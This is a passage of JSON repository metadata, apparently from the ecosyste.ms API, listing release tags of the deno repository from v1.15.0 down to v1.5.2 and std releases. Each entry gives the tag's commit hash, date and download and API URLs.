ts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@